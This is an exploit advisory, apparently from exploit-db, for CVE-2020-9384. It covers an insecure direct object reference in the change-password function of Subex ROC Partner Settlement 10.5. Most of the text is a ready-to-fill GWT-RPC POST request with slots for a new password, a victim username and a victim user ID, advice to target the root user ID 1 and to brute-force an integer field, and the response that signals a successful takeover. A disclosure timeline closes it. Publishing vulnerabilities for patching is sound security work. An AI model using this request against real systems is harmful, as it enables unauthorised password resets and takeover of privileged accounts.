Subex ROC Partner Settlement 10.5 Insecure Direct Object Reference

`===========================================================================================================  
Subex ROC Partner Settlement 10.5 - Authenticated IDOR in change password function lead to account takeover  
===========================================================================================================  
  
# Exploit Title: Insecure Direct Object Reference (IDOR) vulnerability in change password function of Subex ROC Partner Settlement 10.5 allows remote authenticated users to account takeover via manipulation of POST parameters.  
# Date: 20 February 2020  
# Exploit Author: Kitchaphan Singchai (idealphase), Jirawat Vuthawiphat (Freeze)  
# Vendor Homepage: https://www.subex.com/partner-settlement/  
# Software Link: [download link if available]  
# Version: 10.5 (and probably earlier versions)  
# CVE : CVE-2020-9384  
  
[Summary]  
A change password function is vulnerable to Insecure Direct Object Reference (IDOR). Therefore, Any authenticated user can  
change a victim password. and then masquerade as victim user.  
  
[Vulnerability Details]  
Authentication : authenticated user.  
Page : http://ip:port/commonService  
  
[Sample HTTP POST Request format is Google Web Toolkit (GWT)]  
POST /<REDACTED_URI1>/<REDACTED_URI2>/commonService HTTP/1.1  
Host: <REDACTED_IP_ADDRESS>:<REDACTED_PORT>  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0  
Accept: /  
Accept-Language: th,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: text/x-gwt-rpc; charset=utf-8  
X-GWT-Permutation: C2F56A526C284847E8CB55F5C9540273  
X-GWT-Module-Base: https://<REDACTED_IP_ADDRESS>:<REDACTED_PORT>/<REDACTED_URI1>/<REDACTED_URI>/  
Content-Length: 326  
Connection: close  
Referer: https://<REDACTED_IP_ADDRESS>:<REDACTED_PORT>/<REDACTED_URI>/<REDACTED_FILENAME>.html  
Cookie: JSESSIONID=0DE915A64064A2C9A7CADB7B85EB71FB; GWT_LOCALE=en_GB; A48EE5E800701A3D7942009555C67E71=1002226284; 4587BA7D7CD481833715E8495588AFBF=410786149; session-id=session-id  
7|2|24|https://<REDACTED_IP_ADDRESS>:<REDACTED_PORT>/<REDACTED_URI1>/<REDACTED_URI2>/|D451683615061B43F5EB83714BAECE53|com.google.gwt.user.client.rpc.XsrfToken/4254043109|25543866D9D80B67F35B7482D162B874|com.subex.spark.web.app.client.module.options.changepassword.ChangePasswordDetailService|saveModel|com.subex.spark.web.app.client.module.options.changepassword.UserTblModel/430295178|<INSERT_NEW_PASSWORD_HERE>|java.lang.Boolean/476441737|java.lang.Integer/3438268394|<INSERT_ARBITRARY_USERNAME_HERE>|com.subex.spark.web.app.client.framework.models.EntityTblForAbstractFSModel/3643375843|UserTbl|User|com.subex.gwt.datamodel.SerializerMap/3044779994|extraArgDfnModelList|ExtraControl|java.lang.String/2004016611||forceAlphaNumericValue|N|abstractEntityTbl|UserPassword|User Password|1|2|3|4|5|6|1|7|7|8|0|9|1|10|6|11|8|12|13|14|13|543|9|0|0|-6|0|-246160|1|1|0|0|0|11|-6|0|0|0|10|3|-6|0|0|<BRUTE_FORCE_THIS_INTEGER_VALUE_START_FROM_0_UNTIL_FOUND_//OK[0,[],0,7]_IN_HTTP_RESPONSE_MESSAGE>|-3|11|-6|0|<VICTIM_USER_ID_FOR_ROOT_USER_MOST_PRIVILEGE_IN_THIS_SYSTEM_IS_1>|1|1|15|4|16|0|17|18|19|20|18|21|22|12|23|24|23|535|-6|0|-6|0|-246162|1|1|0|25543866D9D80B67F35B7482D162B874  
  
[Step to reproduce]  
<!-- Exploit Authors request to remove this part on 16 April 2020-->  
  
[Expected successful change password in HTTP response message]  
HTTP/1.1 200 OK  
...  
Content-Length: 14  
Connection: close  
  
//OK[0,[],0,7]  
  
[Timeline]  
2/Oct/2019 - Contacted Subex live chat and Sending details shared with associated E-mail and get first response  
4/Oct/2019 - Subex told that they had an internal discussion at Subex and the product team will take care of the problem internally.  
18/Nov/2019 - Waiting any update from Subex and send details about public vulnerability disclosure, Subex told that they will discuss this internally and get back to you at the earliest.  
20/Feb/2020 - Sending CVE request on https://cveform.mitre.org/ and submitting exploit detail to exploit-db  
25/Feb/2020 - CVE assigned as CVE-2020-9384`